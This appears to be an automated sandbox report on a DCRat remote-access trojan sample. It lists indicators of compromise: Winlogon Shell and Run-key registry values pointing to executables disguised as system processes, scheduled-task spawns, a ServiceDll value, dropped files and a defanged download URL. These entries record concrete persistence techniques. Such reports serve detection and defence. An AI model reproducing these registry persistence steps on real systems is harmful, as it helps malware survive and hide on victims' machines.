dcrat | hxxps://www[.]upload[.]ee/files/16597642/dcrat[.]zip[.]html

Analysis

max time kernel
2222s
max time network
2228s
platform
windows11-21h2_x64
resource
win11-20241023-en
resource tags

arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
submitted
04-11-2024 13:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.upload.ee/files/16597642/dcrat.zip.html

Score

10^/10

dcrat defense_evasion discovery infostealer motw persistence phishing rat upx

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 25 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

dwm.exeblockwinref.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\", \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\", \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	dwm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\", \"C:\\Windows\\IdentityCRL\\blockwinref.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\", \"C:\\Windows\\IdentityCRL\\blockwinref.exe\", \"C:\\Program Files\\dotnet\\unsecapp.exe\", \"C:\\Users\\Admin\\Searches\\lsass.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\", \"C:\\Windows\\IdentityCRL\\blockwinref.exe\", \"C:\\Program Files\\dotnet\\unsecapp.exe\", \"C:\\Users\\Admin\\Searches\\lsass.exe\", \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\", \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\", \"C:\\Program Files\\Windows Photo Viewer\\services.exe\", \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\", \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\", \"C:\\Windows\\IdentityCRL\\blockwinref.exe\", \"C:\\Program Files\\dotnet\\unsecapp.exe\", \"C:\\Users\\Admin\\Searches\\lsass.exe\", \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\", \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\", \"C:\\Program Files\\Windows Photo Viewer\\services.exe\", \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\", \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\conhost.exe\", \"C:\\Windows\\IdentityCRL\\blockwinref.exe\", \"C:\\Program Files\\dotnet\\unsecapp.exe\", \"C:\\Users\\Admin\\Searches\\lsass.exe\", \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\", \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\", \"C:\\Program Files\\Windows Photo Viewer\\services.exe\", \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\", \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\", \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	dwm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\", \"C:\\Windows\\IdentityCRL\\blockwinref.exe\", \"C:\\Program Files\\dotnet\\unsecapp.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\", \"C:\\Windows\\IdentityCRL\\blockwinref.exe\", \"C:\\Program Files\\dotnet\\unsecapp.exe\", \"C:\\Users\\Admin\\Searches\\lsass.exe\", \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\", \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\", \"C:\\Program Files\\Windows Photo Viewer\\services.exe\", \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\", \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\", \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\dotnet\\unsecapp.exe\", \"C:\\Users\\Admin\\Searches\\lsass.exe\", \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\", \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\", \"C:\\Program Files\\Windows Photo Viewer\\services.exe\", \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\", \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\", \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	dwm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\services.exe\", \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\", \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\", \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	dwm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	dwm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\", \"C:\\Program Files\\Windows Photo Viewer\\services.exe\", \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\", \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\", \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	dwm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\", \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	dwm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\", \"C:\\Windows\\IdentityCRL\\blockwinref.exe\", \"C:\\Program Files\\dotnet\\unsecapp.exe\", \"C:\\Users\\Admin\\Searches\\lsass.exe\", \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Searches\\lsass.exe\", \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\", \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\", \"C:\\Program Files\\Windows Photo Viewer\\services.exe\", \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\", \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\", \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	dwm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\", \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\", \"C:\\Program Files\\Windows Photo Viewer\\services.exe\", \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\", \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\", \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	dwm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\", \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	dwm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe"	dwm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\", \"C:\\Windows\\IdentityCRL\\blockwinref.exe\", \"C:\\Program Files\\dotnet\\unsecapp.exe\", \"C:\\Users\\Admin\\Searches\\lsass.exe\", \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\", \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\", \"C:\\Windows\\IdentityCRL\\blockwinref.exe\", \"C:\\Program Files\\dotnet\\unsecapp.exe\", \"C:\\Users\\Admin\\Searches\\lsass.exe\", \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\", \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\", \"C:\\Program Files\\Windows Photo Viewer\\services.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\", \"C:\\Windows\\IdentityCRL\\blockwinref.exe\", \"C:\\Program Files\\dotnet\\unsecapp.exe\", \"C:\\Users\\Admin\\Searches\\lsass.exe\", \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\", \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\", \"C:\\Program Files\\Windows Photo Viewer\\services.exe\", \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\", \"C:\\Windows\\IdentityCRL\\blockwinref.exe\", \"C:\\Program Files\\dotnet\\unsecapp.exe\", \"C:\\Users\\Admin\\Searches\\lsass.exe\", \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\", \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\", \"C:\\Program Files\\Windows Photo Viewer\\services.exe\", \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\", \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\", \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	dwm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\IdentityCRL\\blockwinref.exe\", \"C:\\Program Files\\dotnet\\unsecapp.exe\", \"C:\\Users\\Admin\\Searches\\lsass.exe\", \"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\", \"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\", \"C:\\Program Files\\Windows Photo Viewer\\services.exe\", \"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\", \"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\", \"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	dwm.exe

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1156	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4608	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3408	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6968	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5800	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2224	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6760	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6644	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1356	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7980	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3788	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7152	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2960	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4612	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7952	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7476	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4756	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6696	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4124	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6840	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3396	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5000	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1460	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	704	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2776	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7140	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8008	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2156	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5416	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4452	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7680	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3836	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7256	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2720	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	892	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5696	5408	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1608	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7348	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6976	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5244	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2980	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6692	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7920	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4032	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5552	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5296	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3160	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4972	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6388	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1400	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6812	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7064	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7156	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1472	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4924	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3916	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2224	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6636	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4180	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6020	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2632	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5712	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6760	1336	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2896	1336	schtasks.exe

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/2028-9674-0x0000000000450000-0x0000000000526000-memory.dmp	dcrat
C:\surrogatecontainerWebreviewSvc\dwm.exe	dcrat

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

windowssdk.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DriverDisplayKeyboard\Parameters\ServiceDll = "C:\\Windows\\System32\\DriverDisplayKeyboard.dll"	windowssdk.exe

Executes dropped EXE 23 IoCs

Processes:

windowssdk.exeDCRatBuilder.exeDCRatBuild.exeblockwinref.exedwm.exeDCRatBuild.exeblockwinref.exeunsecapp.exeservices.exeRuntimeBroker.execonhost.exelsass.exeunsecapp.exeWmiPrvSE.exeRuntimeBroker.exebackgroundTaskHost.exeservices.exeDCRatBuild.exeDCRatBuild.exeDCRatBuild.exeDCRatBuild.exeDCRatBuild.exeDCRatBuild.exe

pid	process
8156	windowssdk.exe
7012	DCRatBuilder.exe
6624	DCRatBuild.exe
2028	blockwinref.exe
7328	dwm.exe
1992	DCRatBuild.exe
6332	blockwinref.exe
5832	unsecapp.exe
6692	services.exe
8136	RuntimeBroker.exe
6276	conhost.exe
6996	lsass.exe
7896	unsecapp.exe
6764	WmiPrvSE.exe
4844	RuntimeBroker.exe
7720	backgroundTaskHost.exe
4264	services.exe
5508	DCRatBuild.exe
7396	DCRatBuild.exe
5368	DCRatBuild.exe
4800	DCRatBuild.exe
7624	DCRatBuild.exe
2604	DCRatBuild.exe

Loads dropped DLL 3 IoCs

Processes:

svchost.exedotNET_Reactor.exe

pid process

6548 svchost.exe
6432 dotNET_Reactor.exe
6432 dotNET_Reactor.exe

pid	process
6548	svchost.exe
6432	dotNET_Reactor.exe
6432	dotNET_Reactor.exe

Adds Run key to start application 2 TTPs 24 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

blockwinref.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Admin\\Searches\\lsass.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files\\Windows Photo Viewer\\services.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\surrogatecontainerWebreviewSvc\\conhost.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\blockwinref = "\"C:\\Windows\\IdentityCRL\\blockwinref.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Admin\\Searches\\lsass.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.371\\backgroundTaskHost.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Sidebar\\conhost.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\blockwinref = "\"C:\\Windows\\IdentityCRL\\blockwinref.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\surrogatecontainerWebreviewSvc\\csrss.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files\\Windows Photo Viewer\\services.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\bcastdvr\\WmiPrvSE.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\surrogatecontainerWebreviewSvc\\RuntimeBroker.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Windows\\Offline Web Pages\\backgroundTaskHost.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\surrogatecontainerWebreviewSvc\\dwm.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Sidebar\\conhost.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Program Files\\dotnet\\unsecapp.exe\""	blockwinref.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Program Files\\dotnet\\unsecapp.exe\""	blockwinref.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

311 raw.githubusercontent.com
861 raw.githubusercontent.com
Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs
phishing motw

Processes:

flow ioc

